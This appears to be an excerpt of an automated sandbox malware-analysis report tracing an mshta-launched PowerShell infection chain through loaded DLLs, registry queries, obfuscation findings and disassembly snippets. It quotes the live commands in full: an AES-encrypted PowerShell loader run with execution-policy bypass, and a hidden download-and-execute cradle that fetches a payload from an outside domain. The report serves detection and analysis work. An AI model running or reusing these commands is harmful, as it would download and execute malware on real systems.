                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

                Data Obfuscation

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Z));$ByTESTring = $eNC.$5i0JbyjAuxq1w2syC8nBHy6E2dFhjl9Jo19iPGiz68mBwchiWcAMIFdgIuM6C1BigrxWztkc1ltpoJyxzjE1vr83aYHbceP72RVCYl29Wo0DYCMUc7r2H3c2TPUFgK5J0F8KYw4smX8q71CMT82gf9PkIMLXvs
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function eSNNy($MAvcZ){return -split ($MAvcZ -replace '..', '0x$& ')};$lqmB = eSNNy('5C3F827BAC65B5D2C8965D0BBCE1ED07B9B6786A8751F026D08EFD0A825F531A8D091C0ECDD11B3934B46C626B865735BAB41B512BE15DE11F5E12515F7078B31EE8399C0E805B1F986B48CD1FE4A4708FA30B93CA4F7E812CA54A8793D62D3598E2B95AF0842B9C9750010609AF477848F4D131B954661400575166055C03EF1B5DE596CF55C542063D3F91CE19CE97925E58F6C32246A890129F4332D50885100C3526774D0074EEC5D7A612D64456E89E2AAD35E8F4DCB634817B8F6E0AC4FA605341C50069355F250ADB57D33D199E78EDCF80294758E47CB522EDFFFE73CC1B919EF16AF41E32F5B6A9BF909AE30CEB1071E2D14015FB77F6298FF2B02FEBA7B2BEE205F03CF88FF6F6BEBEEC0309A6D27D56500B79ADD62DD9D50A9590F07C9425FF02C2062F0E3444952489CE539FE357B044D8F72560487A102CC157F9E4E5B39D9C8DEF45655607C7A2FDB595ECBD612595FE995C4B043F8955A8F51FB018D2638C4F3A04E4CE1F6F77607E28264761F8517127E32F9F8D159565861F352D53ED7157874F263F52A7E1025A408CACC8B208E7F7776300701055FD3D6C30CA49783C822471E5B37491DA64E22ECA5ACEAE2C26465A1465F8774B5536298C89DBC028CD0AE43DBABB7B1179BD528CA17B1C6D0B390408ECE7927FEAA32EA4FAF5B6249A55C0BB8FCE630BBE9577950A1C82CEB3F5B1CC3B4D16D0DD85009C2C1593600E9AD124BD3E71F96E9ECC581D41A94B73C3A20BF4550FA7E08728A080D7A6A09FF218A0A37CDF4EF3F6A50CCC9DDEE0D24287949B372601CA8769A11092428566941E5E81DC734A344A92E5B54939A7B808EA27414A69BECE50356ADA32AF76C66A7EED81FF79A3208EA6CA1E28D54700AB34FB6270B5B4EC13DA50EBF0B9BBAB023861142203272D6112A5A6D9726B68EF794031846478BC822C4C0391F73AD6DD169DCDF33D909E115BCFB9021A0D74ABB583032AC14EDAF563EB221F82DBE70815740F8F4F65B3993B4805F2F8DED176EF03650D5BA2D74E1919BECB701A86B2332083BFBE1C6D8903AB78E68721C77F780C3596EDC51E77');$jAMAa=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((eSNNy('49446F52676D7356434761614A6E6878')),[byte[]]::new(16)).TransformFinalBlock($lqmB,0,$lqmB.Length)); & $jAMAa.Substring(0,3) $jAMAa.Substring(129)
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://dma.sportstalk-musiclover.com/singl7.pst'))"
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function eSNNy($MAvcZ){return -split ($MAvcZ -replace '..', '0x$& ')};$lqmB = eSNNy('5C3F827BAC65B5D2C8965D0BBCE1ED07B9B6786A8751F026D08EFD0A825F531A8D091C0ECDD11B3934B46C626B865735BAB41B512BE15DE11F5E12515F7078B31EE8399C0E805B1F986B48CD1FE4A4708FA30B93CA4F7E812CA54A8793D62D3598E2B95AF0842B9C9750010609AF477848F4D131B954661400575166055C03EF1B5DE596CF55C542063D3F91CE19CE97925E58F6C32246A890129F4332D50885100C3526774D0074EEC5D7A612D64456E89E2AAD35E8F4DCB634817B8F6E0AC4FA605341C50069355F250ADB57D33D199E78EDCF80294758E47CB522EDFFFE73CC1B919EF16AF41E32F5B6A9BF909AE30CEB1071E2D14015FB77F6298FF2B02FEBA7B2BEE205F03CF88FF6F6BEBEEC0309A6D27D56500B79ADD62DD9D50A9590F07C9425FF02C2062F0E3444952489CE539FE357B044D8F72560487A102CC157F9E4E5B39D9C8DEF45655607C7A2FDB595ECBD612595FE995C4B043F8955A8F51FB018D2638C4F3A04E4CE1F6F77607E28264761F8517127E32F9F8D159565861F352D53ED7157874F263F52A7E1025A408CACC8B208E7F7776300701055FD3D6C30CA49783C822471E5B37491DA64E22ECA5ACEAE2C26465A1465F8774B5536298C89DBC028CD0AE43DBABB7B1179BD528CA17B1C6D0B390408ECE7927FEAA32EA4FAF5B6249A55C0BB8FCE630BBE9577950A1C82CEB3F5B1CC3B4D16D0DD85009C2C1593600E9AD124BD3E71F96E9ECC581D41A94B73C3A20BF4550FA7E08728A080D7A6A09FF218A0A37CDF4EF3F6A50CCC9DDEE0D24287949B372601CA8769A11092428566941E5E81DC734A344A92E5B54939A7B808EA27414A69BECE50356ADA32AF76C66A7EED81FF79A3208EA6CA1E28D54700AB34FB6270B5B4EC13DA50EBF0B9BBAB023861142203272D6112A5A6D9726B68EF794031846478BC822C4C0391F73AD6DD169DCDF33D909E115BCFB9021A0D74ABB583032AC14EDAF563EB221F82DBE70815740F8F4F65B3993B4805F2F8DED176EF03650D5BA2D74E1919BECB701A86B2332083BFBE1C6D8903AB78E68721C77F780C3596EDC51E77');$jAMAa=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((eSNNy('49446F52676D7356434761614A6E6878')),[byte[]]::new(16)).TransformFinalBlock($lqmB,0,$lqmB.Length)); & $jAMAa.Substring(0,3) $jAMAa.Substring(129)Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://dma.sportstalk-musiclover.com/singl7.pst'))" Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B7D00AD pushad ; iretd 0_2_00007FFD9B7D00C1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B12103D push E95B641Eh; ret 4_2_00007FFD9B121069
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B12106A push E95B641Eh; ret 4_2_00007FFD9B121069
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_03178D70 pushad ; iretd 6_2_03178D71
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_03178D78 push eax; iretd 6_2_03178D79
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_03177DE0 push eax; ret 6_2_03177DE1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04D742BD push ebx; ret 6_2_04D742DA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077BA7CA push E8CE8B71h; retf 6_2_077BA7D1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077BA7BD push 8904E871h; iretd 6_2_077BA7C2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077B7E47 push B276E871h; iretd 6_2_077B7E50
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077B9EB7 push 9208E871h; iretd 6_2_077B9EBE
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077B95BE push 9B01E871h; iretd 6_2_077B95C5
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077BDC7A push edi; iretd 6_2_077BDC7B
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077BDCE0 push edi; iretd 6_2_077BDCE1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077B5B53 push D56CE871h; iretd 6_2_077B5B5A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077B5A64 push D65BE871h; iretd 6_2_077B5A6B
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077B5AE5 push D5BEE871h; iretd 6_2_077B5B08
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077B5AA0 push D621E871h; iretd 6_2_077B5AA5
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077B016C push FFFFFF8Bh; ret 6_2_077B016E
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077B414D push EF74E871h; iretd 6_2_077B4152
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077B01B8 push FFFFFF8Bh; iretd 6_2_077B01BF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077B4065 push ebp; iretd 6_2_077B4070
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077C1E58 push ss; iretd 6_2_077C1E59
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077C2D59 push es; iretd 6_2_077C2D6C
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077C5CA9 pushfd ; iretd 6_2_077C5CAA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077C504D push eax; retf 6_2_077C504E
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077CA0EA pushad ; retf 6_2_077CA0EB
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077D3D10 pushad ; iretd 6_2_077D3D11
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_07AE21B5 push 8C089B58h; retf 6_2_07AE21CD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0043D810 push eax; mov dword ptr [esp], 707F7E0Dh12_2_0043D812
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00443469 push ebp; iretd 12_2_0044346C
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
